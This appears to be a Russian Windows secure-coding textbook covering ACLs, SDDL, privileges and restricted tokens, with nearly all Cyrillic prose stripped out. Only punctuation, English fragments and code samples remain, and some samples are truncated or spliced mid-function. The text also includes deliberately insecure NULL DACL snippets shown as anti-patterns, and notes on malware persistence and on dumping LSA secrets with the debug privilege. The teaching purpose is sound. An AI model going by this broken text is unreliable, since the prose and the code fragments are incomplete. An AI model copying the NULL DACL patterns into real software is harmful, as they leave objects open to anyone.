        if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
                                      SECURITY_BUILTIN_DOMAIN_RID,
                                      DOMAIN_ALIAS_RID_ADMINS,
                                      0, 0, 0, 0, 0, 0,
                                      &pAdminSID))
            throw GetLastError();
        ea[2].grfAccessPermissions = GENERIC_ALL;
        ea[2].grfAccessMode = SET_ACCESS;
        ea[2].grfInheritance = NO_INHERITANCE;
        ea[2].Trustee.TrusteeForm = TRUSTEE_IS_SID;
        ea[2].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
        ea[2].Trustee.ptstrName = (LPTSTR) pAdminSID;

        // Create a new ACL that contains the three ACEs.
        // SetEntriesInAcl returns the error code directly, not via GetLastError.
        DWORD dwRes = SetEntriesInAcl(NUM_ACES,
                                      ea,
                                      NULL,
                                      &pACL);
        if (dwRes != ERROR_SUCCESS)
            throw dwRes;

        // Initialize a security descriptor.
        pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
                                               SECURITY_DESCRIPTOR_MIN_LENGTH);
        if (pSD == NULL)
            throw GetLastError();
        if (!InitializeSecurityDescriptor(pSD,
                                          SECURITY_DESCRIPTOR_REVISION))
            throw GetLastError();

        // Add the ACL to the security descriptor.
        if (!SetSecurityDescriptorDacl(pSD,
                                       TRUE,   // fDaclPresent flag
                                       pACL,
                                       FALSE)) {
            throw GetLastError();
        } else {
            SECURITY_ATTRIBUTES sa;
            sa.nLength = sizeof(SECURITY_ATTRIBUTES);
            sa.bInheritHandle = FALSE;
            sa.lpSecurityDescriptor = pSD;
            if (!CreateDirectory("C:\\Program Files\\MyStuff", &sa))
                throw GetLastError();
        }
    } catch (DWORD dwErr) {
        // Report the failed call.
        printf("Error %lu\n", dwErr);
    }

    if (pSD)
        LocalFree(pSD);
    if (pACL)
        LocalFree(pACL);
    // Use FreeSid for SIDs allocated with AllocateAndInitializeSid.
    if (pEveryoneSID)
        FreeSid(pEveryoneSID);
    if (pNetworkSID)
        FreeSid(pNetworkSID);
    if (pAdminSID)
        FreeSid(pAdminSID);
    return 0;
}
Secureco2\Chapter06. ,
, . ,
ACL
(security descriptor).
SECURITY_ATTRIBUTES, , ,
. :
( SID), SetSecurityDescriptorOwner;
( SID), SetSecurityDescriptorGroup;
DACL, SetSecurityDescriptorDacl;
SACL, SetSecurityDescriptorSacl.
. , ,
, ,
Administrators (),
. DACL,
EXPLICIT_ACCESS. EXPLICIT_ACCESS
ACE (SID)
, . EXPLICIT_ACCESS
, , ACE .
ACL . 61.
API, ACL:
SetFileSecurity SetNamedSecurityInfo. Windows NT,
Windows NT 4 .
Windows 2000 ,
(Security Descriptor Definition Language), .
Fig. 6-1. (figure: SECURITY_ATTRIBUTES, SECURITY_DESCRIPTOR, ACL, EXPLICIT_ACCESS, SID)
/*
    SDDLACL.cpp
*/
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <sddl.h>
#include <stdio.h>

int main() {
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = FALSE;
    const char *szSD = "D:P"                    // Protected DACL
                       "(D;OICI;GA;;;BG)"       // Deny Guests all access
                       "(A;OICI;GA;;;SY)"       // Allow SYSTEM full control
                       "(A;OICI;GA;;;BA)"       // Allow Administrators full control
                       "(A;OICI;GRGWGX;;;IU)";  // Allow Interactive users read,
                                                // write and execute
    if (ConvertStringSecurityDescriptorToSecurityDescriptor(
            szSD,
            SDDL_REVISION_1,
            &(sa.lpSecurityDescriptor),
            NULL)) {
        if (!CreateDirectory("C:\\MyDir", &sa)) {
            DWORD err = GetLastError();
            printf("CreateDirectory failed: %lu\n", err);
        }
        LocalFree(sa.lpSecurityDescriptor);
    }
    return 0;
}
( Secureco2\Chapter06.)
, Windows NT 4. SDDL
szSD .
SDDL ACL (. 62).
6-2.
SDDL-
SDDL-
D:P
D , DACL. S:
ACE ( SACL). ACE
. P SE_DACL_PROTECTED,
ACE
.
,
(D;OICI;GA;;;BG)
ACE. ACE
.
D ACE.
OICI . , ACE
(
) ( ),
.
GA Generic All Access, .
BG Guests (Builtin Guests).
ACE
.
ObjectTypeGuid InheritedObjectTypeGuid.
, ACE (
). ACE
A ACE.
(A;OICI;GA;;;SY)
SY SYSTEM ( )
(A;OICI;GA;;;BA)
(A;OICI;GRGWGX;;;IU)
GR , GW , GX .
IU Interactive (,
)
. 62 SDDL.
DACL
D:(D;OICI;GA;;;BG)(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)
ACE
. 62.
ACE
SDDL
,
. 63 SID Windows 2000
.
Account Operators ( )
AU
Authenticated Users ( )
BA
BG
BO
Backup Operators ( )
BU
CA
CO
DA
Domain Administrators ( )
6-3.
()
SDDL-
DG
Domain Guests ( )
DU
Domain Users ( )
IU
Interactive ()
LA
Local Administrator ( )
LG
Local Guest ( )
NU
Network ()
PO
Print Operators ( )
PU
Power Users ( )
RC
Restricted Code ,
CreateRestrictedToken Windows 2000
SO
Server Operators ( )
SU
SY
Local System ( )
WD
World ( , Everyone)
NS
LS
AN
RD
NO
LU
MU
SDDL , SDDL
XML. , SDDL INF
(Security Configuration Editor)
ACL NTFS.
Windows (Windows Security
Push)
, Windows XP Logging Users Monitoring Users.
Blake (Read);
Administrators (Full Control);
Guests (Deny: Access).
/*
    ATLACL.cpp
*/
#include <atlsecurity.h>
#include <iostream>
using namespace std;

int main() {
    try {
        // Build the SIDs for the trustees.
        CSid sidBlake("Northwindtraders\\blake");
        CSid sidAdmin = Sids::Admins();
        CSid sidGuests = Sids::Guests();

        // Build the ACL with three ACEs.
        // Note: the deny ACE is added first.
        CDacl dacl;
        dacl.AddDeniedAce(sidGuests, GENERIC_ALL);
        dacl.AddAllowedAce(sidBlake, GENERIC_READ);
        dacl.AddAllowedAce(sidAdmin, GENERIC_ALL);

        // Build the security descriptor and attributes.
        CSecurityDesc sd;
        sd.SetDacl(dacl);
        CSecurityAttributes sa(sd);

        // Create the directory with the ACL.
        if (CreateDirectory("c:\\MyTestDir", &sa))
            cout << "Directory created!" << endl;
    } catch (CAtlException e) {
        cerr << "Error, "
             << hex << (HRESULT)e << endl;
    }
    return 0;
}
Sids::Admins() Sids::Guests().
SID ,
Administrators Guests, ,
Windows (, , )
. SID
C++, atlsecurity.h.
, ,
Windows NT 4 Windows 2000. , Windows NT 4,
, , Windows 2000, SDDL
. Secureco2\Chapter06.
, ACL ,
ACL.
ACE-
ACE ACL.
Windows ACE.
,
. ,
ACL , , ACE,
. ACE
ACL:
, (Explicit Deny);
, (Explicit Allow);
, ;
, ;
, ;
, ;
, ;
, . .
ACL ACE,
.
1. GetSecurityInfo GetNamedSecurityInfo,
ACL .
2. ACE EXPLICIT_ACCESS.
3. SetEntriesInAcl, ACL EXPLICIT_ACCESS, ACE.
4. SetSecurityInfo SetNamedSecurityInfo,
ACL .
C++, .
, , CreateWellKnownSid (
Windows 2000 SP3, Windows XP Windows .NET Server),
, ATL CSid.
/*
SetUpdatedACL.cpp
*/
#define _WIN32_WINNT 0x0501
#include "windows.h"
#include "aclapi.h"
#include <sddl.h>
NULL,
pNewDacl,
NULL);
} catch(DWORD e) {
//
}
if (sidAuthUsers)
LocalFree(sidAuthUsers);
if (sd)
LocalFree(sd);
if (pNewDacl)
LocalFree(pNewDacl);
return dwErr;
}
AddAccessAllowedAceEx AddAccessAllowedObjectAce ACE
ACL. ACL
.
, AddAccessAllowedACE,
ACL.
AddAccessAllowedACEEx.
SID
Windows SID (Terminal
Server) (Remote Desktop),
, (Windows 2000 Server) (Windows XP
). SID ,
, ACL, :
Administrators (Full Control);
Remote Desktop Users (Read) [ (
)];
Interactive Users (Read, Write).
: SID Remote Desktop Users,
.
:
, Madison
. Madison SID
Interactive, ;
Madison ;
Windows XP VPN;
Madison
SID Remote Desktop Users.
, ,
, ,
.
, , Madison ,
, .
:
. , Madison
.
, , Madison
, SID
!
, ?
, ACL.
DACL ACE
DACL (NULL DACL)
, .
, NULL DACL = . .
,
, , , ,
, DACL, .
,
, , DACL !
, ,
. .
if (SetSecurityDescriptorDacl(&sd,
                              TRUE,   // The DACL is present...
                              NULL,   // ...but it is NULL!
                              FALSE)) {
    // The object now has a NULL DACL: no protection at all.
}
SECURITY_DESCRIPTOR. DACL:
SECURITY_DESCRIPTOR sd = {
    SECURITY_DESCRIPTOR_REVISION,
    0x0,
    SE_DACL_PRESENT,
    0x0,
    0x0,
    0x0,
    0x0};
// The DACL is flagged as present but the Dacl pointer is 0,
// i.e. a NULL DACL: the object is unprotected.
DACL, ATL
Visual Studio .NET.
Windows XP, Secure Windows Initiative Team
Windows Security Penetration Team
DACL, .
,
DACL, :
,
ACL. ,
ACL;
DACL ,
DACL .
,
, ,
!
,
. , ACL ,
.
ACL, .
.
DACL
.
NULL, DACL
, DACL, .
Perl DACL
C++ C ,
Microsoft. DACL,
,
DACL . ,
,
, DACL. :
SetSecurityDescriptorDacl(&sd,
TRUE,
NULL, // DACL
FALSE);
( ) :
SetSecurityDescriptorDacl(&sd,
TRUE,
::malloc(0xFFFFFFFF), // DACL
FALSE);
, . malloc
, NULL.
0xFFFFFFFF, 4 294 967 295 , ,
, DACL NULL!
, , , ,
. ,
.
DACL
DACL : (
) Everyone (Deny: Access),
, Windows
. ,
DACL SACL !
! DACL . ,
, .
ACE
ACE : Everyone (WRITE_DAC), Everyone (WRITE_OWNER) ACL, .
Everyone (WRITE_DAC)
WRITE_DAC DACL .
ACL,
.
Everyone (WRITE_OWNER)
WRITE_OWNER
. , , .
, ,
.
Everyone (FILE_ADD_FILE)
ACE Everyone (FILE_ADD_FILE) ,
. ,
, .
, ,
, .
Everyone (DELETE)
ACE ,
, ,
.
Everyone (FILE_DELETE_CHILD)
Windows Delete
subfolders and files ( )
, , .
FILE_DELETE_CHILD ,
.
Everyone (GENERIC_ALL)
GENERIC_ALL, Full Control ( ), ,
NULL DACL. .
, DACL
,
DACL, , , .
:
.
DACL,
.
ACE,
, !
ACL,
:
DACL [Everyone (WRITE_DAC)];
[Everyone (WRITE_OWNER)];
[Everyone (DELETE)].
, ,
:
ACL , .
.NET Framework COM+, IP,
SQL Server. ,
, ACL .
,
, .
,
, ( ) .
, ,
.
:
,
, .
, , ,
.
Windows : .NET
Framework COM+. .
.NET Framework
.NET Framework
,
(principal). (
) Windows .
.NET Framework
/ .
,
(
).
. ,
.
.NET Framework
.
(. ): Lippert LaMacchia, Lange .
.NET Framework PrincipalPermission, CLR (Common Language Runtime)
, .
PrincipalPermission ,
,
.
, , .
, .NET Framework
Web Web:
// .
}
:
WindowsPrincipal principal =
    (Thread.CurrentPrincipal as WindowsPrincipal);
if (principal.IsInRole("Administrator")) {
    // The caller is an administrator.
}
: WindowsPrincipal. IsInRole ,
Windows, GenericPrincipal. IsInRole ,
,
.
GenericPrincipal ,
. C#, :
COM+
COM+ Windows,
.
,
. , ,
, , ,
, .
COM+ Component
Services ( ) IsCallerInRole.
, Visual Basic:
.
Dim fAllowed As Boolean
Dim objCallCtx As SecurityCallContext
Set objCallCtx = GetSecurityCallContext()
' Check whether the caller is in the Doctor role.
fAllowed = objCallCtx.IsCallerInRole("Doctor")
If (fAllowed) Then
    ' Perform the operation allowed for doctors.
End If
ACL, , ,
,
. ,
.
fIsDoctor = objCallCtx.IsCallerInRole("Doctor")
fIsOnDuty = IsCurrentlyOnDuty(szPersonID)
If (fIsDoctor And fIsOnDuty) Then
    ' Perform the operation allowed only for doctors who are
    ' currently on duty.
End If
.
IP-
Web, IIS.
Web, IP (, 192.168.19.23),
(192.168.19.0/24), DNS (www.microsoft.com) (.microsoft.com). Web
IP,
IP ,
.
accounting.northwindtraders.com,
: IP.
IP ,
. : IP
,
(127.0.0.1).
! Web,
IP, IP
127.0.0.1.
VBScript , IP
Samples Web ,
localhost ( 127.0.0.1).
IP.
Dim oVDir
Dim oIP
Set oVDir = GetObject("IIS://localhost/W3SVC/1/Samples")
Set oIP = oVDir.IPSecurity
' Set the IP grant list: only 127.0.0.1 is allowed.
Dim IPList(0)
IPList(0) = "127.0.0.1"
oIP.IPGrant = IPList
' Deny every other address by default.
oIP.GrantByDefault = False
' Write the new IP security settings back to the
' IIS metabase.
oVDir.IPSecurity = oIP
oVDir.SetInfo
Set oIP = Nothing
Set oVDir = Nothing
SQL Server
SQL Server
.
, .
: . ,
, . ,
.
SQL Server ACL Windows,
: (
) . :
Blake Accounts (),
, AuditLog (
). SQL Server .
, ACL
. .
,
.
, ,
;
. ,
,
.
.
,
,
.
, .
,
:
: .
:
: ;
: ;
: .
:
: ;
: ;
: .
,
Windows SQL Server,
COM+. (:
.) :
ACL. , SQL Server;
, .
. ,
SQL Server.
,
. ,
.
, .
. . 63 IP
Web.
Fig. 6-3. (figure: IP restrictions, Web server)
IP
, .
, IP,
.
! , ,
, .
. IIS,
( !) Web (
) : I .
! , Web, ,
Web
. , Web
SMB.
, ACL Web
?
!
! :
ACL, SQL Server, IP .
,
, ,
ACL IP,
.
ACL ,
. ACL
.
, 3, ACL
.
:
.
,
. ,
, .
, .
,
. Windows
,
.
. ,
!
(
), ,
, .
,
(
, , ),
. ,
, , ,
. ,
Administrators (),
.
.
, ,
, ,
. ,
.
, ,
, ,
.
!
,
.
,
, ,
, .
,
.
( , ),
.
(malware).
, , ,
, ,
.
, ,
, ,
. ,
.
(defacement) Web.
,
, .
, ,
.
, , ,
.
Back Orifice
,
: , ,
.
Back Orifice Windows
, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
. ,
Back Orifice .
SubSeven
Back Orifice, SubSeven
. SubSeven
Windows, Win.ini System.ini,
HKEY_LOCAL_MACHINE HKEY_CLASSES_ROOT.
. ,
, SubSeven .
FunLove
FunLove, Symantec W32.Funlove.4099,
, W32.Bolzano.
, , ,
. FunLove
Windows NT Ntoskrnl.exe.
FunLove ,
.
ILoveYou
, , , VBS.Loveletter The Love Bug. ILoveYou Microsoft
Outlook. : ,
HKEY_LOCAL_MACHINE .
, .
Web-
Web, ,
(script kiddies). Web Internet
Information Services (IIS),
(Internet Printing Protocol, IPP) Microsoft Windows 2000.
, IPP ISAPI
(Internet Server Application Programming Interface),
(SYSTEM).
Microsoft (http://www.microsoft.com/technet/security/bulletin/MS01-023.asp):
, ISAPI
. ,
,
,
. ,
.
IPP Windows 2000 SYSTEM,
Web .
,
Web.
! ,
,
,
.
, .
! ,
, ,
Windows.
Microsoft Windows NT/2000/
XP Windows .NET Server 2003 :
(Discretionary Access Control List, DACL). DACL (
ACL* ) (Access Control Entry, ACE).
ACE (Security ID, SID)
(principal), , ,
, .
, ,
, ACL.
ACL 6.
Windows ,
, (
) , ,
, ,
. . ,
(, )
. 71.
7-1.
Windows
( )
#define (Winnt.h)
SeBackupPrivilege (16)
SE_BACKUP_NAME
SeRestorePrivilege (17)
SE_RESTORE_NAME
SE_TCB_NAME
Debug Programs
( )
SeDebugPrivilege (19)
SE_DEBUG_NAME
SeAssignPrimaryToken
Privilege (2)
SE_ASSIGNPRIMARYTOKEN_
NAME
SE_LOAD_DRIVER_NAME
SE_TAKE_OWNERSHIP_NAME
SeTakeOwnershipPrivilege (8)
,
, ,
.
.
,
.
.
SeBackupPrivilege
Backup files and directories
, . , Blake
, , , ACL
.
, CreateFile FILE_FLAG_BACKUP_SEMANTICS. , .
1. ,
,
.
2. Test.txt .
3. ACL ACE,
. , Blake, ACE:
Blake (Deny All).
4. .
, , MSDN (http://
msdn.microsoft.com) Platform SDK
/*
    WOWAccess.cpp
*/
#include <stdio.h>
#include <windows.h>

// Enables the named privilege in the current process token.
// Returns 0 on success and -1 on failure.
int EnablePriv(char *szPriv) {
    HANDLE hToken = 0;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES,
                          &hToken)) {
        printf("OpenProcessToken() -> %lu", GetLastError());
        return -1;
    }
    TOKEN_PRIVILEGES newPrivs;
    if (!LookupPrivilegeValue(NULL, szPriv,
                              &newPrivs.Privileges[0].Luid)) {
        printf("LookupPrivilegeValue() -> %lu",
               GetLastError());
        CloseHandle(hToken);
        return -1;
    }
    newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    newPrivs.PrivilegeCount = 1;
    if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs, 0,
                               NULL, NULL)) {
        printf("AdjustTokenPrivileges() -> %lu",
               GetLastError());
        CloseHandle(hToken);
        return -1;
    }
    // AdjustTokenPrivileges succeeds even when the token does not hold
    // the privilege; ERROR_NOT_ALL_ASSIGNED reports that case.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        printf("AdjustTokenPrivileges() succeeded, "
               "but not all privileges were assigned\n");
    CloseHandle(hToken);
    return 0;
}
Test.txt 0x80.
CreateFile() !> 5
Test.txt 0x2000080 flags
, 15 .
: Hello, Blake!
, CreateFile
( 5), , ,
, FILE_FLAG_BACKUP_SEMANTICS.
SeBackupPrivilege . ,
SeBackupPrivilege SeRestorePrivilege,
. NTBackup.exe,
, ACL,
, .
SeBackupPrivilege .
, :
;
, .
SeRestorePrivilege
,
. , DLL EXE
, ! ,
,
.
SeDebugPrivilege
Debug Programs
,
. ,
. 9.
,
SSL/TLS,
, nCipher (http://www.ncipher.com).
, TerminateProcess
Debug Programs . , ,
, ,
, Lsass.exe,
(Local Security Authority, LSA).
!
, CreateRemoteThread
.
LSADUMP2 (http://razor.bindview.com/tools):
LSA.
Lsass.exe ,
, .
LSA 9.
(Jeffrey Richter) Programming Applications for Microsoft Windows
(Microsoft Press) ( . Windows :
Win32 64 Windows. .:
; .: , 2001).
,
Debug Programs ,
.
. , Blake
, ,
Cheryl.
SeTcbPrivilege
Act as part of the operating system [
Trusted Computing Base (TCB)]
.
Windows.
SYSTEM.
! TCB,
. , , ,
.
TCB
LogonUser,
. , Windows XP, LogonUser
Windows
.
Passport GroupSid NULL.
SeAssignPrimaryTokenPrivilege
SeIncreaseQuotaPrivilege
Replace A Process Level Token Increase Quotas
(spoofing)
.
SeLoadDriverPrivilege
, .
SeLoadDriverPrivilege,
.
,
.
, (Plug and Play)
Plug and Play.
SeRemoteShutdownPrivilege
.
: ,
. ,
, Everyone ()
! DS (Denial of Service)
!
SeTakeOwnershipPrivilege
Windows NT/2000/XP (owner).
( ),
, .
,
.
, Windows XP ,
,
. Windows XP , Windows
.NET Server 2003,
Administrators (),
.
Windows NT/2000/XP
(token),
. SID , SID
, , .
,
. ,
.
(,
) .
Windows 2000,
SID .
(restricted token). ,
.
, ,
SID, ACL
Microsoft Windows NT/2000/XP
, , .
.
, CreateProcessAsUser. , ,
CreateProcessAsUser, SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege. , ,
,
, SeAssignPrimaryTokenPrivilege .
,
(Service Control Manager, SCM).
Local System,
,
SCM (. 71).
Fig. 7-1. SCM
LSA.
LSA 9.
,
,
,
, .
,
, .
SID ,
SID .
ACL, .
, ,
,
. ,
, .
? :
.
, SID .
, .
, ,
SID .
, ,
, ,
. , , ,
, :
, ACL;
, ;
LSA.
,
.
ACL
NTFS ACL:
SYSTEM Full Control ( );
Administrators () Full Control ( );
Everyone () Read ().
,
, (
/
). : 5!
: ,
, ,
.
C:\Program Files? : .
,
. ,
.
!
,
. ! Game Over!
GENERIC_ALL
, ACL,
, , . ACL
GENERIC_ALL.
?
SYSTEM. GENERIC_ALL Full Control
( ). ,
. ,
. GENERIC_ALL? , .
GENERIC_READ,
, ACL Read
() Everyone ().
: ,
, ,
( ACE)
.
: Windows NT/2000/XP
, .
, ACL ,
.
,
dwDesiredAccess MAXIMUM_ALLOWED,
, .
,
. :
,
. .
LSA
LSA .
LSA API LsaStorePrivateData LsaRetrievePrivateData.
, LSA
. Platform SDK LsaStorePrivateData: , DACL
. , LSA
, ,
.
,
-
( ),
.
ACL
ACL:
;
,
;
ACL .
, ,
. ,
. ,
.
:
, HKEY_LOCAL_MACHINE,
C:\Program Files ( ,
%PROGRAMFILES%) C:\Winnt (%SYSTEMROOT%).
HKEY_CURRENT_USER,
.
:
#include "shlobj.h"
...
TCHAR szPath[MAX_PATH];
...
// Resolve the current user's "My Documents" folder instead of a hard-coded path.
if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_PERSONAL, NULL, 0, szPath))) {
    HANDLE hFile = CreateFile(szPath, ...);
    ...
}
, ,
,
, .
:
.
,
(ACL) ,
. , ,
ACL .
.
,
, , .
, ,
! ,
, .
LSA
Windows 2000/XP API (Data Protection API, DPAPI).
,
,
,
.
DPAPI 9.
6, ACL
ACE. SID .
, SID
.
.
( ),
SID , .
1. , .
2. API, .
3. , .
4. , SID .
5. , SID .
6. .
1: ,
,
: , , , Active Directory,
. ., ,
. , Windows
, ,
. 72.
7-2.
, -
.
2: ,
API-
,
(. 73).
Table 7-3. Windows functions and the privileges they require
Function                                         Privilege
CreateFile with FILE_FLAG_BACKUP_SEMANTICS       SeBackupPrivilege
LogonUser                                        SeTcbPrivilege (not required on Windows XP and Windows .NET Server 2003)
SetTokenInformation                              SeTcbPrivilege
ExitWindowsEx                                    SeShutdownPrivilege
OpenEventLog                                     SeSecurityPrivilege
BroadcastSystemMessage[Ex] (BSM_ALLDESKTOPS)     SeTcbPrivilege
SendMessage and PostMessage                      SeTcbPrivilege
RegisterLogonProcess                             SeTcbPrivilege
InitiateSystemShutdown[Ex]                       SeShutdownPrivilege, SeRemoteShutdownPrivilege
SetSystemPowerState                              SeShutdownPrivilege
GetFileSecurity                                  SeSecurityPrivilege
DebugActiveProcess, ReadProcessMemory            SeDebugPrivilege
CreateProcessAsUser                              SeIncreaseQuotaPrivilege, SeAssignPrimaryTokenPrivilege
CreatePrivateObjectSecurityEx                    SeSecurityPrivilege
SetSystemTime                                    SeSystemtimePrivilege
VirtualLock and AllocateUserPhysicalPages        SeLockMemoryPrivilege
NetUserAdd, NetLocalGroupDel and similar         membership in Administrators or Account Operators
NetJoinDomain                                    SeMachineAccountPrivilege
, Windows
(wrappers) COM.
, , , ,
Windows.
3: ,
, .
,
.
,
.
.
:
!
4:
, SID ,
.
, RunAs
. ,
:
( )
, ,
, .
, ,
SYSTEM,
. ,
17:01,
, :
/*
    MyToken.cpp
*/
#define SECURITY_WIN32
#include "windows.h"
#include "security.h"
#include "strsafe.h"
#include <stdio.h>

#define MAX_NAME 256

// Queries the size of the requested token information class and
// allocates a buffer large enough to hold it. The caller frees it.
LPVOID AllocateTokenInfoBuffer(
    HANDLE hToken,
    TOKEN_INFORMATION_CLASS InfoClass,
    DWORD *dwSize) {
    *dwSize = 0;
    GetTokenInformation(
        hToken,
        InfoClass,
        NULL,
        *dwSize, dwSize);
    return new BYTE[*dwSize];
}

// Prints the current user's name in several formats.
void GetUserNames() {
    EXTENDED_NAME_FORMAT enf[] = {NameDisplay,
        NameSamCompatible, NameUserPrincipal};
    for (int i = 0; i < sizeof(enf) / sizeof(enf[0]); i++) {
        char szName[128];
        DWORD cbName = sizeof(szName);
        if (GetUserNameEx(enf[i], szName, &cbName))
printf("\nSIDS\n");
GetAllSIDs(hToken,TokenGroups);
printf("\nRestricting SIDS\n");
GetAllSIDs(hToken,TokenRestrictedSids);
printf("\nPrivileges\n");
GetPrivs(hToken);
RevertToSelf();
CloseHandle(hToken);
return 0;
}
MyToken.cpp Secureco2\Chapter07
.
, SID, SID .
GetUser, GetAllSIDs GetPrivs.
GetAllSIDs: SID.
( )
.
, , SID
( [DENY]).
,
, OpenProcessToken.
, Token Master
(Jeffrey Richter) (Jason Clark) Programming ServerSide
Applications for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
Microsoft Windows 2000. .:
; .: , 2001)
. Token Master
,
(. 72).
Token Information SID ,
SID .
. , MyToken.cpp
:
User
SIDS
NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
Privileges
SeChangeNotifyPrivilege (3)
SeSecurityPrivilege (0)
SeBackupPrivilege (0)
SeRestorePrivilege (0)
SeSystemtimePrivilege (0)
SeShutdownPrivilege (0)
SeRemoteShutdownPrivilege (0)
SeTakeOwnershipPrivilege (0)
SeDebugPrivilege (0)
SeSystemEnvironmentPrivilege (0)
SeSystemProfilePrivilege (0)
SeProfileSingleProcessPrivilege (0)
SeIncreaseBasePriorityPrivilege (0)
SeLoadDriverPrivilege (2)
SeCreatePagefilePrivilege (0)
SeIncreaseQuotaPrivilege (0)
SeUndockPrivilege (2)
SeManageVolumePrivilege (0)
. 72. Cmd.exe,
SYSTEM
, . 74.
Table 7-4.
Attribute                          Value
SE_PRIVILEGE_USED_FOR_ACCESS       0x80000000
SE_PRIVILEGE_ENABLED_BY_DEFAULT    0x00000001
SE_PRIVILEGE_ENABLED               0x00000002
5:
SID-
: ,
SID ,
, .
, 1 2, 4
. SID ,
, .
SID, Users
() Everyone (), .
.
ACL,
, !
,
, .
.
6:
.
:
,
, ;
(restricted tokens);
.
.
,
. , 95%
, .
,
, Windows
PrivilegeCheck.
, ,
.
! ,
,
.
, .
. ,
,
. :
.
.
,
.
Web, SYSTEM,
. ,
,
SYSTEM. ,
,
:
;
Windows
;
. ,
!
.
, .
,
. SYSTEM
,
,
SYSTEM. ( , )
RevertToSelf,
, SYSTEM.
, RevertToSelf
. , , IIS 5. Web
, , [
(High) (Medium) ].
IWAM_<_>.
IIS [ (Low)
], SYSTEM.
,
,
. , IIS 6
, SYSTEM, ,
SYSTEM Web, .
Windows 2000/XP .
(restricted) ,
, CreateRestrictedToken.
, ,
. CreateRestrictedToken
:
;
SID (restricting SID);
SID (deny
only attribute).
:
. .
SID
,
SID.
,
SID ,
.
SID. ACL
Everyone () , Administrators ()
, . .
, .
Brian, .
:
Everyone ();
Authenticated Users ( );
Administrators ();
Marketing.
,
()
Everyone.
. Brian
, ,
, SID. (
Administrators, ), .
SID, SID Everyone
, Everyone
.
SID,
, (AND)
SID, .
SID.
SID
(deny-only SID)
.
. ACL Marketing ACE Deny:
Full Control (: ), SID
Marketing, . ACE
Marketing Allow: Read (: ), SID
Marketing ,
.
, , , . 75
.
7-5.
SID ACL
ACL
Marketing
Allow: Read
ACL
Marketing
Deny: Full Control
SID
Marketing
ACE
SID Marketing
ACE
ACL
ACE-
Marketing
: SID
, SID
. . ACL
Marketing. SID Marketing
, , , ,
! SID
.
,
.
,
SID , .
, ,
SID .
Windows 2000/XP .
,
, SID. ,
Authenticated
Users, SID Authenticated Users.
, ,
( ).
,
,
. : (, )
( ).
ShellExecute CreateProcess
, .
-,
CreateProcessAsUser,
.
ImpersonateLoggedOnUser SetThreadToken ,
.
, ,
: , SeChangeNotifyPrivilege ( ).
DISABLE_MAX_PRIVILEGE,
, SID
.
/*
    Restrict.cpp
*/
// Create a SID for BUILTIN\Administrators.
BYTE sidBuffer[256];
PSID pAdminSID = (PSID)sidBuffer;
SID_IDENTIFIER_AUTHORITY SIDAuth = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuth, 2,
                              SECURITY_BUILTIN_DOMAIN_RID,
                              DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,
                              &pAdminSID)) {
    printf("AllocateAndInitializeSid Error %lu\n", GetLastError());
    return -1;
}

// Mark the SID to be disabled; in the new token it becomes a deny-only SID.
SID_AND_ATTRIBUTES SidToDisable[1];
SidToDisable[0].Sid = pAdminSID;
SidToDisable[0].Attributes = 0;

// Get the current process token.
HANDLE hOldToken = NULL;
if (!OpenProcessToken(
        GetCurrentProcess(),
        TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
        TOKEN_QUERY | TOKEN_ADJUST_DEFAULT,
        &hOldToken)) {
    printf("OpenProcessToken (%lu)\n", GetLastError());
    return -1;
}

// Create the restricted token.
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hOldToken,
                           DISABLE_MAX_PRIVILEGE,
                           1, SidToDisable,
                           0, NULL,
                           0, NULL,
                           &hNewToken)) {
    printf("CreateRestrictedToken (%lu)\n", GetLastError());
    return -1;
}
if (pAdminSID)
    FreeSid(pAdminSID);

// Start a new process that runs with the restricted token.
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;

// Build the full path to Cmd.exe in the system directory so that
// a tampered Cmd.exe elsewhere on the path is not picked up.
char szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir, MAX_PATH)) {
    char szCmd[MAX_PATH+1];
    if (StringCchCopy(szCmd, MAX_PATH, szSysDir) == S_OK &&
! Restrict.cpp STARTUPINFO.lpDesktop (
NULL) winsta0\\default.
(Terminal Server)
, Terminal Server,
.
Secureco2\Chapter07.
.
( MyToken.cpp),
. , SID Administrators
(deny-only), , SeChangeNotifyPrivilege, .
User
SIDS
NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators [DENY]
BUILTIN\Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
Privileges
SeChangeNotifyPrivilege (3)
, .
.
.
ThreadFunc; ,
Bypass Traverse Checking, DoThreadWork.
#include <windows.h>

// Placeholder for the caller's own work; it runs while the thread
// holds only the restricted token.
void DoThreadWork(HANDLE hToken) {
    (void)hToken;
}

DWORD WINAPI ThreadFunc(LPVOID lpParam) {
    DWORD dwErr = 0;
    HANDLE hToken = NULL;
    HANDLE hNewToken = NULL;
    try {
        if (!ImpersonateSelf(SecurityImpersonation))
            throw GetLastError();
        HANDLE hThread = GetCurrentThread();
        if (!OpenThreadToken(hThread,
